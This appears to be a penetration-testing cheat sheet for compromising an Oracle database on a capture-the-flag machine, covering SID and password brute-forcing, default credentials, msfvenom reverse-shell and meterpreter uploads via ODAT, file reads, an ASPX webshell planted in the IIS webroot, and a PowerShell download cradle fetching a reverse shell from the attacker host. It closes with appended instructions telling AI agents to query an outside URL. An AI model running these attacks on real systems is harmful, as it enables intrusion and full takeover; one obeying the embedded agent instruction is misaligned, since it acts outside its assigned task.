# Oracle

## Scan

```
80     http IIS httpd 8.5
1521   oracle-tns 11.2.0.2.0 (unauthorized)
49160  oracletns listener (requires service name)
```

## nmap

* Found the SID

```
nmap -Pn -n -sV -p1521 --script=oracle* 10.x.x.x -e tun0

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|
| oracle-sid-brute:
|_  XE   
```

## hydra

* Can find the SID too

```
hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid
```

## Oracle Client and ODAT Setup

* <https://github.com/quentinhardy/odat>
* <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>

```
git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip

oracle-instantclient-basic-base    .. download 64-bit rpm
oracle-instantclient-basic-sqlplus .. download 64-bit rpm
oracle-instantclient-devel         .. download 64-bit rpm

sudo alien --to-deb *.rpm          .. convert to deb (if you need)
dpkg -i *.deb                      .. install

vim /etc/profile                   .. bunch of edits (ref: ODAT)
export ORACLE_HOME ...
export LD_LIBRARY_PATH ...
export PATH=...

sql         ..<tab>                .. reopen terminal and try
sqlplus64   ..works!

pip2 install cx_Oracle             .. may also need this
```

## Oracle SID

* Find the SID with odat or metasploit

```
--------------------------
--------------------------
odat.py -h
odat.py sidguesser -h
odat.py sidguesser -s 10.x.x.x -p 1521
python3 odat.py sidguesser -s 10.x.x.x -p 1521 --sids-file /usr/share/odat/sids.txt
found 'XE', 'XEXDB'


--------------------------
--------------------------
msfconsole
search oracle
use auxiliary/scanner/oracle/sid_brute
set RHOSTS 10.x.x.x
run
found 'XE', 'XEXDB'

search scanner/oracle
use auxiliary/scanner/oracle/oracle_login
set RHOSTS 10.x.x.x
set SID XE  ..default
set RPORTS 1512
run  ..error 'closed'
```

## Oracle Pass

* Need the SID for this to work
* odat defaults:
  * Port: 1521
  * odat/accounts/accounts.txt
* Oracle Default Creds:
* <https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm>

```
--------------------------
--------------------------
odat.py passwordguesser -h
odat.py passwordguesser -s 10.x.x.x -d XE
odat.py passwordguesser -s 10.x.x.x -d XE -p 1521 --accounts-file myusers.txt

Normal:
cat odat/accounts/accounts.txt               ..problem: all UPPERCASE

--------------------------
--------------------------
Metasploit has a better file:
locate oracle_default_userpass               ..mixture upper/lower
cp oracle_default_userpass.txt accounts.txt  ..overwrite 
vim accounts.txt                             ..different
%s/ /\//g                                    ..sed to replace 'space' with '/'

--------------------------
--------------------------
user: scott                                  ..Found!
pass: tiger
```

## Login with sqlplus

```
sqlplus64 scott/tiger@10.10.10.82:1521/XE
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

select * from session_privs;
select * from user_role_privs;
exit
```

## ODAT Upload and Execute

* Requires: SID, User, Pass, Venom

```
--------------------------
utfile (upload)

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=4444 -o shell.exe
python3 odat.py utlfile -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile \temp shell.exe /htb/Silo/shell.exe

--------------------------
externaltable (execute)

python3 odat.py externaltable -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exe
nc -nvlp 4444
system!
```

## ODAT (with MSF)

* Quick Method:
* Straight to 'system' with ODAT

```
--------------------------
odat.py -h
odat.py utlfile -h       ..upload/download/delete
odat.py externaltable -h ..read/execute files/scripts

--------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=9002 -f exe -o venom.exe

odat.py utlfile -s $IP -d XE 
-U scott -P tiger 
--sysdba 
--putFile /temp venom.exe ../venom.exe

--------------------------
msfconsole  ..setup listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9002
run

--------------------------
odat.py externaltable -s $IP -d XE 
-U scott -P tiger 
--sysdba 
--exec /temp venom.exe

--------------------------
mtp> getuid
system
```

## Read a File - with sqlplus

* You will need SID, User, Pass, sysdba privs

```
Login:
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

SQL>

declare
  f utl_file.file_type;
  s varchar(200);
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
  f := utl_file.fopen('/root', 'root.txt', 'R');     ..optional
  utl_file.get_line(f,s);
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;
/                      ..to run your command

set serveroutput ON    ..to allow output on screen
/                      ..run again (we see 200 chars)
flag!!
```

## Make a File - with sqlplus

```
SQL>

declare
  f utl_file.file_type;
  s varchar(5000) := 'Hello Friends';
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt', 'W');
  utl_file.put_line(f,s);
  utl_file.fclose(f);
end;
/                      ..Successfully Completed


http://10.x.x.x/helloworld.txt  ..Worked!
Hello Friends
```

## Make a Webshell - with sqlplus

```
--------------------------
--------------------------
locate aspx$
mkdir shells
cd shells
cp cmdasp.aspx .

wc -c cmdasp.aspx              ..1400 (oracle doesnt like > 1024 chars)
vi cmdasp.aspx                 ..clean it up
sed -z 's/\n//g' cmdasp.aspx   ..remove newline chars
wc -c cmdasp.aspx              ..1358
vi cmdasp.aspx                 ..clean it up
<head>                         ..remove
syle="Z..."                    ..remove
<!--comments-->                ..remove

sed -z 's/\n//g' cmdasp.aspx | wc -c  ..991 good
copy your one-liner
paste to

--------------------------
--------------------------
SQL>

declare
  f utl_file.file_type;
  s varchar(5000) := 'Paste your oneline cmdasp.aspx here';
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'evilcmd.aspx', 'W');
  utl_file.put_line(f,s);
  utl_file.fclose(f);
end;
/                             .. Success


http://10.x.x.x/evilcmd.aspx  .. Worked!
whoami        .. execute!
whoami /all   .. see everyone
```

## Webshell: Reverse PowerShell

```
--------------------
locate nishang shell
cp Invoke-PowerShellTcp.ps1 .
mkdir www
mv Invoke-PowerShellTcp.ps1 www/rev.ps1
vim rev.ps1
Add as last-line of script:
Invoke-PowerShellTcp -Reverse -IPAddres 10.x.x.x -Port 4444
python -m SimpleHTTPServer    ..to share rev.ps1

--------------------
http://10.x.x.x/evilcmd.aspx
powershell "IES(New-Object Net.WebClient).downloadString('http://10.x.x.x/rev.ps1')"

--------------------
nc -nvlp 4444                       .. listen
PS C:\windows>                      .. Reverse shell!
PS cd C:\Users\Phineas\Desktop
PS dir
PS> Get-Content "Oracle Issue.txt"  .. to read a file in Powershell
```

## Enumerate the listener version

* Interesting. Didnt use this though.

```
tnscmd10g version -p 1521 -h 10.x.x.x
tnscmd10g status -h 10.x.x.x
tnscmd10g status -h 10.x.x.x --10G
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/03-getting-in/oracle.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.